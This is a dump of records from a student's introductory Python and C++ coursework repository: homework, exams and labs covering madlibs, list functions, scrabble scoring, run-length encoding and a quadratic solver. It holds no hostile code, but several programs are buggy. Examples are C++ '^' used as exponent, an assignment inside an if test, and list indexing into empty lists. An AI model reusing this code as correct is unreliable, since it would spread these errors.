"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def chinese_is_awesome(answer):\n if answer == \"yes\":\n print(\"true dat\")\n \nchinese_is_awesome(\"yes\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7384615540504456,
"alphanum_fraction": 0.7384615540504456,
"avg_line_length": 63,
"blob_id": "9bacb73bcde84e58137f6bde4026f8dd53e8ad8c",
"content_id": "860ac396fefb36113256b624ec7e1f40281424eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 65,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 1,
"path": "/exam_01/README.md",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "Eric Dittus: My pushing is causing errors that I can't seem to solve\n"
},
{
"alpha_fraction": 0.4469696879386902,
"alphanum_fraction": 0.5,
"avg_line_length": 17.85714340209961,
"blob_id": "81b850396541e9068da6dfdd60c10186815eaffe",
"content_id": "b4bebaf7a3fac5c6c1e58140ed0d3eb454c4aa2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 396,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 21,
"path": "/hw_05/hw_05.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#Eric Dittus\ndef filterodd(l):\n i=0\n oddlist=[]\n while i<=len(l)-1:\n if l[i] % 2 is not 0:\n oddlist.append(l[i])\n i = i + 1\n return oddlist\n \nprint(filterodd([1,2,3,4,5,6,7,8]))\n\ndef mapsquare(l):\n i=0\n squaredlist=[]\n while i<=len(l)-1:\n squaredlist.append(l[i]*l[i])\n i = i + 1\n return squaredlist\n\nprint(mapsquare([4,2,5,3,5]))\n"
},
{
"alpha_fraction": 0.5719497203826904,
"alphanum_fraction": 0.5804620981216431,
"avg_line_length": 47.3725471496582,
"blob_id": "75c634560de6b919ce960b885013bdff762466fc",
"content_id": "73140a41c69c034bfffe7885b6fc4bbc7eff5c45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2467,
"license_type": "no_license",
"max_line_length": 319,
"num_lines": 51,
"path": "/lab_032/madlibs.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#Eric Dittus & Chana Abramov\nimport random\nProperNoun=['Irvington','Jerry', 'Elizabeth','Hillside']\nnoun=['greenbeans', 'cars','markers','cologne']\nverb=['died', 'laughed', 'smoked', 'twerked']\nadverb=['merrily','terribly','cryptically','bootyliciously']\nadjective=['fat','childish','soggy','beautiful','muscular']\nanimal=['lion', 'zebra', 'lil piggy', 'hippo', 'house cat', 'fat fly']\nfurniture=['chair', 'bed','desk','mirror', 'a strange painting']\ncountry=['Israel','Cuba','Syria', 'Turkey','Uzbekistan','China']\nlanguage=['Spanish','Hebrew','Mandarin','Cantonese','Russian']\nMadlib= \"There once was a man named <ProperNoun> and he loved to eat <noun> a lot. This man lived in <country> and spoke <language> . He had a <adjective> <animal> as a companion, and his most prized posession in his house was a <adjective> <furniture> . He grew old and <verb> until he layed down <adverb> and <verb> \"\n\ndef MADLIB(Madlib):\n list_madlib = Madlib.split(' ')\n i=0\n space=\" \"\n while i< len(list_madlib)-1:\n if \"<\" in list_madlib[i]:\n if \"ProperNoun\" in list_madlib[i]:\n index = random.randint(0, len(ProperNoun)-1)\n list_madlib[i]=ProperNoun[index]\n if \"noun\" in list_madlib[i]:\n index = random.randint(0, len(noun)-1)\n list_madlib[i]=noun[index]\n if (\"verb\" in list_madlib[i]) and (\"ad\" not in list_madlib[i]):\n index = random.randint(0, len(verb)-1)\n list_madlib[i]=verb[index]\n if \"adverb\" in list_madlib[i]:\n index = random.randint(0,len(adverb)-1)\n list_madlib[i]=adverb[index]\n if \"animal\" in list_madlib[i]:\n index = random.randint(0,len(animal)-1)\n list_madlib[i]=animal[index]\n if \"adjective\" in list_madlib[i]:\n index = random.randint(0,len(adjective)-1)\n list_madlib[i]=adjective[index]\n if \"furniture\" in list_madlib[i]:\n index = random.randint(0,len(furniture)-1)\n list_madlib[i]=furniture[index]\n if \"country\" in list_madlib[i]:\n index = random.randint(0,len(country)-1)\n list_madlib[i]=country[index]\n if \"language\" in list_madlib[i]:\n index = random.randint(0,len(language)-1)\n list_madlib[i]=language[index]\n \n i+=1\n return space.join(list_madlib)\n\nprint(MADLIB(Madlib))\n"
},
{
"alpha_fraction": 0.52949059009552,
"alphanum_fraction": 0.5482573509216309,
"avg_line_length": 24.689655303955078,
"blob_id": "874e4460b8f579e1111346c938d1a7788eb8e93b",
"content_id": "5c0b45718532e3370497e8040d319e485c1e3fb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 746,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 29,
"path": "/final_2/plural.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "\ndef countPlurals(line):\n count = 0\n i = 0\n list_line = line.split()\n while i <= len(list_line)-1:\n word = list_line[i]\n if word[-1:] == 's':\n count += 1\n i +=1\n return count\n\nprint(countPlurals(\"there once were astronaughts\"))\nprint(countPlurals(\"s s s s s s s\"))\nprint(countPlurals(\"okays dokeys please give me free candeys\"))\n\ndef notPossesive(line):\n count = 0\n i = 0\n list_line = line.split()\n while i <= len(list_line)-1:\n word = list_line[i]\n if word[-1:] == 's':\n if word[-2:-1] != '\\'':\n count += 1\n i +=1\n return count\n\nprint(notPossesive(\"there were's a mans cats hat's\"))\nprint(notPossesive(\"what's the matters with you's\"))\n"
},
{
"alpha_fraction": 0.4620901644229889,
"alphanum_fraction": 0.5204917788505554,
"avg_line_length": 26.11111068725586,
"blob_id": "5073f376d347a381cebb232f839d560d600970ec",
"content_id": "4d9d4c81eb8bed5fb4de04ee849874a693314347",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 976,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 36,
"path": "/final_1/quad.cpp",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <math.h>\nint a,b,c,r,disc;\n\nint discriminant(int a, int b, int c){\n int disc = (b^2)-(4*a*c);\n return disc;\n}\n\nint quadsolve(int a, int b, int c){\n if(discriminant(a,b,c)>=0){\n int r = (sqrt(discriminant(a,b,c)) -(b))/(2*a);\n return r;\n }\n else{return 0;}\n}\n\nint main()\n{\n std::cout << \"discriminant function test:\\n\\n\";\n std::cout << \"a = 3, b = 5, c = 2\\n\";\n std::cout << discriminant(3,5,2) << std::endl;\n std::cout << \"a = 1, b = -2, c = 20\\n\";\n std::cout << discriminant(1,-2,20) << std::endl;\n std::cout << \"a = 0, b = -20, c = -200\\n\";\n std::cout << discriminant(0,-20,-200) << std::endl;\n\n std::cout << \"quadsolve function test:\\n\\n\";\n std::cout << \"a = 3, b = -4, c = -5\\n\";\n std::cout << quadsolve(3,-4,-5) << std::endl;\n std::cout << \"a = 1, b = -2, c = -20\\n\";\n std::cout << quadsolve(1,-2,-20) << std::endl;\n std::cout << \"a = 0, b = -20, c = -200\\n\";\n std::cout << quadsolve(0,-20,-200) << std::endl;\n\n}\n"
},
{
"alpha_fraction": 0.6097015142440796,
"alphanum_fraction": 0.6179104447364807,
"avg_line_length": 24.30188751220703,
"blob_id": "cfd614b76c387063026e9ef18eb30cfd6547553d",
"content_id": "ef5fc0270a36449325448ce2921449f27a2972bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1340,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 53,
"path": "/test/program.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def capitalize(name):\n \"\"\"\n input: name --> a string in the form \"first last\"\n output: returns a string with each of the two words capitalized\n note: this is the one we started in class\n \"\"\"\n FI=name[0]\n FI=FI.capitalize()\n Space=name.find(' ')\n SI=name[Space+1]\n SI=SI.capitalize()\n NewName= FI+name[1:Space]+\" \"+ SI+ name[Space+2:]\n return NewName\n\n\ndef init(name):\n \"\"\"\n Input: name --> a string in the form \"first last\"\n Returns: a string in the form \"F. Last\" where it's a capitalized first inital \n and capitalized last name\n \"\"\"\n FI=name[0].capitalize()\n Space=name.find(' ')\n LI=name[Space+1:].capitalize()\n NewName=FI+\". \"+LI\n return NewName\n\ndef part_pig_latin(name):\n \"\"\"\n Input: A string that is a single lower case word\n Returns: that string in fake pig latin -> move the first letter of the word to the end and add \"ay\"\n so: \"hello\" --> \"ellohay\"\n \"\"\"\n NewWord= name[1:]+name[0]+\"ay\"\n return NewWord\n\ndef make_out_word(string,word):\n tag=string[0:2]+word+string[2:]\n return tag\n \ndef make_tags(first,second):\n tag=\"<\"+first+\">\"+second+\"</\"+first+\">\"\n return tag\n \nprint(capitalize(\"eric dittus\"))\n\nprint(init(\"eric dittus\"))\n\nprint(part_pig_latin(\"eric\"))\n\nprint(make_out_word(\"<<>>\",\"eric\"))\n\nprint(make_tags(\"yay\",\"eric\"))"
},
{
"alpha_fraction": 0.5321375131607056,
"alphanum_fraction": 0.5470852255821228,
"avg_line_length": 22.068965911865234,
"blob_id": "0fe6ced7db2d3609f0671879714426008fc3b9db",
"content_id": "ae614b4a3eb6093a7717118f7d90f93e2d49e99e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 669,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 29,
"path": "/exam_01/compress.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#Eric Dittus\ndef compress_word(w):\n i=1\n j=2\n compressed=w[0]\n while i<=len(w)-2:\n letter = w[i:j]\n if letter not in \"aeiouAEIOU\":\n compressed = compressed + letter \n i+=1\n j+=1\n if w[-1] not in \"aeiouAEIOU\":\n last=w[-1]\n compressed = compressed + last\n \n \n return compressed\nprint(compress_word(\"apple\"))\nprint(compress_word(\"Special\"))\n\ndef sentence(line):\n line_list = line.split()\n i=0\n while i<len(line_list):\n line_list[i]=compress_word(line_list[i])\n i+=1\n new_line= \" \".join(line_list)\n return new_line\nprint(sentence(\"I like to eat apple pie.\"))\n"
},
{
"alpha_fraction": 0.4921875,
"alphanum_fraction": 0.5078125,
"avg_line_length": 27.09756088256836,
"blob_id": "7929409d31eca7bb533e16df0cf2bb7e83e95f3d",
"content_id": "e6d01b117377ae09ff7c370daad8e128863758c7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1152,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 41,
"path": "/hw_09/guess.cpp",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#include<iostream>\nusing std::cout;\nusing std::endl;\nint main(){\n int a, b, c, min, max;\n\n std::cout << \"Pick a number from 0 to 99, inclusive.\\n\";\n std::cin >> a;\n min = 0;\n max = 99;\n\n b = (max + min/2);\n\n std::cout << \"Is your number \" << b << \"?\" << std::endl;\n std::cout << \"Input:\" << std::endl;\n std::cout << \"-1: My number is lower, you're bad at this.\" << std::endl;\n std::cout << \"1: My number is higher, you're still bad at this.\" << std::endl;\n std::cout << \"0: You Got It! Wow, that was amazing!\" << std::endl;\n std::cin >> c;\n\n while(c != 0){\n /*b = min + (rand() % static_cast<int>(max - min + 1));*/\n\n if(c = -1){\n max = b;\n\n }\n else{\n min = b;\n }\n b = (max + min)/2;\n std::cout << \"Is your number \" << b << \"?\" << std::endl;\n std::cout << \"Input:\" << std::endl;\n std::cout << \"-1: My number is lower, you're bad at this.\" << std::endl;\n std::cout << \"1: My number is higher, you're still bad at this.\" << std::endl;\n std::cout << \"0: You Got It! Wow, that was amazing!\" << std::endl;\n std::cin >> c;\n }\n std::cout << \"Congrats to me!\" << std::endl;\n return 0;\n}\n"
},
{
"alpha_fraction": 0.4444444477558136,
"alphanum_fraction": 0.4444444477558136,
"avg_line_length": 15,
"blob_id": "94b0d1892fe9ae32419d05a6e219168788e79d10",
"content_id": "2cd12715717d813630bc700f5fa2de064c23a0fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 18,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 1,
"path": "/hw_02/README.md",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "Anthony Sokolov & Eric Dittus\r\n"
},
{
"alpha_fraction": 0.3523809611797333,
"alphanum_fraction": 0.3880952298641205,
"avg_line_length": 11.352941513061523,
"blob_id": "484ec92db46af6b5c18933fc8017f263a27bd207",
"content_id": "643c6389b087f4effb32e9674d0a52812ae4268f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 420,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 34,
"path": "/test/new_lang.cpp",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n\nint main()\n{\n int x = 1;\n int i;\n\n for(i = 1;i < 5;i++){\n x = x * i;\n }\n std::cout << x << \"\\n\";\n\n x = 1;\n i = 1;\n while (i < 5){\n x = x * i;\n i++;\n }\n std::cout << x << \"\\n\";\n\n int r;\n for(r =rand()%100;\n r != 20;\n r=rand()%100){\n std::cout << r << \" \";\n }\n\n void printGreeting(std::string name){\n std::cout << \"Hello\" << name << \"\"\\n\";\n }\n\n return 0;\n\n}\n"
},
{
"alpha_fraction": 0.3835294246673584,
"alphanum_fraction": 0.42588233947753906,
"avg_line_length": 18.31818199157715,
"blob_id": "64d5fdb6779c52ebc568b701655764e81131547e",
"content_id": "92d09db4d6f099500aa58fd2cf9db98137aea415",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 425,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 22,
"path": "/test/practice.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def fizzbuzz(max_num):\n i = 1\n while i <= max_num:\n if (i%5==0):\n if (i%3==0):\n print(\"FIZZBUZZ\")\n else:\n print(\"buzz\")\n if i % 3 == 0:\n if (i%5!=0):\n print(\"fizz\")\n if (i%5!=0) and (i%3!=0):\n print(i)\n i += 1\n\nprint(fizzbuzz(1000))\n\n\ndef didit(name):\n print(name + \" completed this assignment\")\n\nprint(didit(\"Jerry\"))\n"
},
{
"alpha_fraction": 0.7413793206214905,
"alphanum_fraction": 0.8103448152542114,
"avg_line_length": 37.66666793823242,
"blob_id": "826eba51cb3de6f3d180e68d71a0915f7665ace7",
"content_id": "e3fbd2a697e32041faf7d9a462ab7fe223385c63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 116,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 3,
"path": "/quiz-01/Readme.md",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "First, cd into csci127-assignments\nFirst, cd into csci127-assignments\nthen mkdir quiz-01 and then cd into that file\n"
},
{
"alpha_fraction": 0.632016658782959,
"alphanum_fraction": 0.6382536292076111,
"avg_line_length": 25.72222137451172,
"blob_id": "fefd1d1b005b7346f1d7f21aab2d8144641b429f",
"content_id": "1c4b24b729ac780f01a8e23424a5b0e7163b0451",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 481,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 18,
"path": "/exam_02/acronym.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def makeacronym(phrase):\n i = 0\n new_phrase=\"\"\n phrase_list=phrase.split(\" \")\n while i < len(phrase_list):\n next_word = phrase_list[i]\n new_phrase = new_phrase + next_word[0]\n i+=1\n print(new_phrase)\n return new_phrase\n\nmakeacronym(\"laugh out loud\")\nmakeacronym(\"Read...fine manual\")\nmakeacronym(\"In my humble opinion\")\nmakeacronym(\"In my not so humble opion\")\nmakeacronym(\"rsthghghSHBBDB HDBHs\")\nmakeacronym(\".........\")\nmakeacronym(\"?!?/\")\n"
},
{
"alpha_fraction": 0.6524432301521301,
"alphanum_fraction": 0.6524432301521301,
"avg_line_length": 40.514286041259766,
"blob_id": "50c5afd330457fea7b223903a77b7f2f8bf65af3",
"content_id": "644a36ad3f10be9b5275634031466c534818be46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1453,
"license_type": "no_license",
"max_line_length": 323,
"num_lines": 35,
"path": "/hw_07/madlibs.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "import random\n\nsentence = \"There once was a man named <ProperNoun> and he loved to eat <noun> a lot. This man lived in <country> and spoke <language> . He had a <adjective> <animal> as a companion, and his most prized posession in his house was a <adjective> <furniture> . He grew old and <verb> until he layed down <adverb> and <verb> \"\nProperNoun=['Irvington','Jerry', 'Elizabeth','Hillside']\nnoun=['greenbeans', 'cars','markers','cologne']\nverb=['died', 'laughed', 'smoked', 'twerked']\nadverb=['merrily','terribly','cryptically','bootyliciously']\nadjective=['fat','childish','soggy','beautiful','muscular']\nanimal=['lion', 'zebra', 'lil piggy', 'hippo', 'house cat', 'fat fly']\nfurniture=['chair', 'bed','desk','mirror', 'strange painting']\ncountry=['Israel','Cuba','Syria', 'Turkey','Uzbekistan','China']\nlanguage=['Spanish','Hebrew','Mandarin','Cantonese','Russian']\n\ncategory = ['<ProperNoun>','<noun>','<verb>','<adverb>','<adjective>','<animal>','<furniture>','<country>','<language>']\nwords = [ProperNoun,noun,verb,adverb,adjective,animal,furniture,country,language]\n\ndictionary = {}\n\nfor i, j in zip(category, words):\n dictionary[i] = j\n\n\ndef MADLIB(s,d):\n \n product = []\n d['<language>'] = [random.choice(d['<language>'])]\n \n for i in s.split():\n if i in d:\n product.append(random.choice(d[i]))\n else:\n product.append(i)\n return ' '.join(product)\n\nprint(MADLIB(sentence, dictionary))\n"
},
{
"alpha_fraction": 0.4455958604812622,
"alphanum_fraction": 0.4650259017944336,
"avg_line_length": 21.705883026123047,
"blob_id": "756d0c853b4bd3d7d7ffa86cc75be72a2f94694f",
"content_id": "43bd567a3581dce51b0a998eb5122fd115730b2a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 772,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 34,
"path": "/exam_02/rle.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def encode(stringy):\n i = 0\n new_list = []\n while i < len(stringy):\n count=1\n curent_letter = stringy[i]\n j = 0\n while stringy[i] == stringy[i+1]:\n item=[]\n count += 1\n item[0]=curent_letter\n item[1]=counts\n new_list[j] = item\n j+=1\n i+=1\n \n new_list[j]=item\n return new_list\nprint(encode(\"abbaaacddaaa\"))\nprint(encode(\"abcd\"))\nprint(encode(\"ooooooo\"))\n\ndef decode(new_list):\n word = \"\"\n i = 0\n while i < len(new_list):\n item =new_list[i]\n j = 0\n while j <= item[1]:\n word = \"\" + item[0]\n j +=1\n i += 1\nprint(decode(encode(\"abbaaacddaaa\")))\nprint(decode(encode(\"yahhyayayay\")))\n"
},
{
"alpha_fraction": 0.550000011920929,
"alphanum_fraction": 0.550000011920929,
"avg_line_length": 17,
"blob_id": "27a6b477aceab0c3b80ecec8e7a955f88abeceaf",
"content_id": "eeaa4e3dd613442db9bb4a4d7d7cbd25b036830e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 20,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 1,
"path": "/hw_03/README.md",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "Eric Dittus and Shanjida Kamal\r\n"
},
{
"alpha_fraction": 0.5181723833084106,
"alphanum_fraction": 0.5295950174331665,
"avg_line_length": 22.487804412841797,
"blob_id": "78263f14412ac825d4d0d1f19f4517e8f88472b3",
"content_id": "74025d3a513bb395d733ab5ab4f62080b19dc3fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 963,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 41,
"path": "/final_2/scrabble.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def canMakeWord(letters,word):\n count = 0\n i=0\n while i <= len(word) -1:\n if word[i] in letters:\n count += 1\n letters[letters.find(word[i])]==''\n i +=1\n if count == len(word):\n return True\n else:\n return False\n\nprint(canMakeWord(\"ladilmy\",\"daily\"))\nprint(canMakeWord(\"eerriin\",\"eerie\"))\nprint(canMakeWord(\"nope\",\"okay\"))\nprint(canMakeWord(\"wrong\",\"right\"))\n\ndef withWild(letters,word):\n count = 0\n i=0\n while i <= len(word)-1:\n if word[i] in letters:\n count += 1\n letters[letters.find(word[i])]==''\n\n if (word[i] not in letters) and ('?' in letters):\n letters[letters.find('?')]==''\n count += 1\n\n i+=1\n\n if count == len(word):\n return True\n else:\n return False\n\nprint(withWild(\"?????\",\"daily\"))\nprint(withWild(\"?utchg\",\"gotchu\"))\nprint(withWild(\"?utch?\",\"gotchu\"))\nprint(withWild(\"luck\",\"okay\"))\n"
},
{
"alpha_fraction": 0.5202702879905701,
"alphanum_fraction": 0.6013513803482056,
"avg_line_length": 20.14285659790039,
"blob_id": "326ac832f50d72f0788aa3e3abfdd4ad11993bd6",
"content_id": "c72c06024a3bb736c808f7e21a367ca4a5432835",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 148,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 7,
"path": "/exam_01/cake.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def divide(A,B,u):\n People=1/(A/B)\n if People<1 and People!=0:\n People=1\n return People\nprint(divide(5,10,1))\nprint(divide(15,5,1))\n"
},
{
"alpha_fraction": 0.43412160873413086,
"alphanum_fraction": 0.45270270109176636,
"avg_line_length": 24.7391300201416,
"blob_id": "1546efa54668874533d72a2374b5952eb3782658",
"content_id": "0cff42d6368bf2ee7b6d6837e75b0c00fd709a86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 592,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 23,
"path": "/exam_02/scrabble.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def score(w):\n score = 0\n i = 0\n while i < len(w):\n if w[i] in \"aeioulnrstAEIOULNRST\":\n score = score + 1\n if w[i] in \"dgDG\":\n score = score + 2\n if w[i] in \"bcmpBCMP\":\n score = score + 3\n if w[i] in \"fhvwyFHVWY\":\n score = score + 4\n if w[i] in \"kK\":\n score = score + 5\n if w[i] in \"jxJX\":\n score = score + 8\n if w[i] in \"qzQZ\":\n score = score + 10\n i +=1\n return score\nprint(score(\"hello\"))\nprint(score(\"Okaayyayjhk\"))\nprint(score(\"ZZZZABEIss\"))\n"
},
{
"alpha_fraction": 0.4262443482875824,
"alphanum_fraction": 0.4361990988254547,
"avg_line_length": 18.034482955932617,
"blob_id": "257fefa90c69877c5c2a6dea1d6cb4014383681e",
"content_id": "f784d19d0768e55afa001578783de637c8cfce3a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1105,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 58,
"path": "/hw_07/lady.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def happy_ladybugs(L):\n if '_' in L:\n L = L.replace('_','')\n \n repetition = {}\n \n for i in L:\n repetition.setdefault(i,0)\n repetition[i] += 1\n \n for i in repetition.values():\n if i < 2:\n return 'NO'\n \n return 'YES'\n\n elif Full(L):\n return 'YES'\n \n else:\n return 'NO'\n \n \ndef Full(L): \n \n previous = L[0]\n consecutive = 1\n if len(L) == 1:\n return False\n \n for i in range(1,len(L)):\n if L[i] == previous:\n consecutive += 1\n elif consecutive > 1:\n if i == len(L) -1:\n return False\n previous = L[i]\n consecutive = 1\n else:\n return False\n return True\n\n\ndef uniqueitems(l):\n \n unique = []\n for i in l: \n if i not in unique:\n unique.append(i)\n \n return unique\n\n\ngames = ['CBAABC','CCAABB','BBBBBB','_','A_B_AA','LFGG','ALACABAZLE',\n 'SS_____SSAA_MMM']\n\nfor each in games:\n print(each,' ',happy_ladybugs(each)) \n"
},
{
"alpha_fraction": 0.5161895751953125,
"alphanum_fraction": 0.5499765276908875,
"avg_line_length": 22.19780158996582,
"blob_id": "49e0cfd79c9f5d3f44c0dabe89351bb9dda57941",
"content_id": "bca0a766f4438a64737dc2b40ee13389832597f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2131,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 91,
"path": "/hw_04/lists.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#Eric Dittus\nimport random\n\ndef build_random_list(size,max_value):\n \"\"\"\n Parameters:\n size : the number of elements in the lsit\n max_value : the max random value to put in the list\n \"\"\"\n l = [] # start with an empty list\n\n # make a loop that counts up to size\n i = 0\n while i < size:\n l.append(random.randrange(0,max_value))\n # we could have written this instead of the above line:\n # l = l + [random.randrange(0,max_value)]\n i = i + 1\n return l\nprint(build_random_list(5,100))\n\ndef locate(l,value):\n# i=0\n# found_index = -1\n# while i < len(l):\n# print(value,i,l[i])\n# if l[i] == value:\n# found_index = i\n# break\n# i += 1\n# return found_index\n if value in l:\n return l.index(value)\n else:\n return -1\nprint(locate([5,7,8,9,4,6],8))\n\n\ndef count(l,value):\n i=0\n count_value=0\n while i< len(l):\n if l[i]==value:\n count_value += 1\n i += 1\n return count_value\nprint(count([1,1,1,1,2,5,7],1))\n\ndef reverse(l):\n l_new=[]\n i=len(l)-1\n while i>=0:\n l_new.append(l[i])\n i-=1\n return l_new\nprint(reverse([1,2,3,4,5,6]))\n\ndef isIncreasing(l):\n i=0\n less_than_counter=0\n #This will count how many times the previous value is\n #less than the one after it. If the correct\n #amount is met, this program will return true\n while i<=len(l)-2:\n if l[i]<l[i+1]:\n less_than_counter+=1\n else:\n return False\n i+=1\n if less_than_counter==len(l)-1:\n return True\nprint(isIncreasing([1,3,5,6,8,10]))\nprint(isIncreasing([4,3,6,3]))\n \ndef palindrome(l):\n index=0\n mirror_index=-1\n pal_check=0\n while index<= len(l)/2: #should work for odd and even lengths\n if l[index]==l[mirror_index]:\n pal_check+=1\n else:\n return False\n index+=1\n mirror_index-=1\n if (len(l)%2 is 0) and pal_check==len(l)/2:\n return True\n elif (len(l)%2 is not 0) and (pal_check>(len(l)/2-1)):\n return True\nprint(palindrome('eve'))\nprint(palindrome('thaht'))\n\n\n \n \n"
},
{
"alpha_fraction": 0.4723076820373535,
"alphanum_fraction": 0.5061538219451904,
"avg_line_length": 24,
"blob_id": "2f9242a77712e93bd0c3c878c318683d408636ee",
"content_id": "381ce71abb24759aef921e70f6b5a3d225159a15",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 650,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 26,
"path": "/hw_03/sqrt.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "import random\n#could not figure it out, but found this online\n#def mysqrt(x):\n# epsilon = 0.01\n# left= 0\n# right = x\n# guess = (right+left)/2.0\n# while abs(guess**2 - x) > epsilon:\n# if guess**2 < x:\n# left = guess\n# else:\n# right = guess\n# guess = (right+left)/2.0\n# print (guess)\ndef mysqrt(square):\n output=0\n guess=0\n i=0\n if ((square - output*output)/100) > 0.01:\n while square != output*output:\n guess = random.randint(1,square)\n output = (guess + (square/guess))/2\n print (output)\n i = i + 1\n \n return output\n"
},
{
"alpha_fraction": 0.4000000059604645,
"alphanum_fraction": 0.4000000059604645,
"avg_line_length": 9,
"blob_id": "40d12a81e7a2bf5dda0d778486baf0b930bffab6",
"content_id": "b3f7898ca8c6980794edce7071ccca093dd2a090",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 10,
"license_type": "no_license",
"max_line_length": 9,
"num_lines": 1,
"path": "/hw_04/README.md",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "## Eric Dittus\n"
},
{
"alpha_fraction": 0.5346359014511108,
"alphanum_fraction": 0.5559502840042114,
"avg_line_length": 16.59375,
"blob_id": "c9ede81a22d7b07d6cb320c77e5cb01017c79548",
"content_id": "6c513fa269bec7e413d1e8dadf80660a9ccf8d1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 563,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 32,
"path": "/hw_06/stats.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "'''\nCreated by SAM EBERSOLE and ERIC DITTUS\n'''\n\n\nimport random\n\ndef create_random_list():\n i = 0\n list = []\n while i <= 100:\n list.append(random.randint(0,10))\n i += 1\n return list\n \ndef find_largest (list):\n largest = 0\n for item in list:\n if item > largest:\n largest = item\n return largest\n\ndef count_occurance (num, list):\n count = 0\n for item in list:\n if item == num:\n count += 1\n return count\n\nlist = create_random_list()\nprint(find_largest(list))\nprint(count_occurance(6, list))\n"
},
{
"alpha_fraction": 0.304964542388916,
"alphanum_fraction": 0.32860520482063293,
"avg_line_length": 17.636363983154297,
"blob_id": "ca4b9f00f9d1933908b4e82c57ff8d479774f9ae",
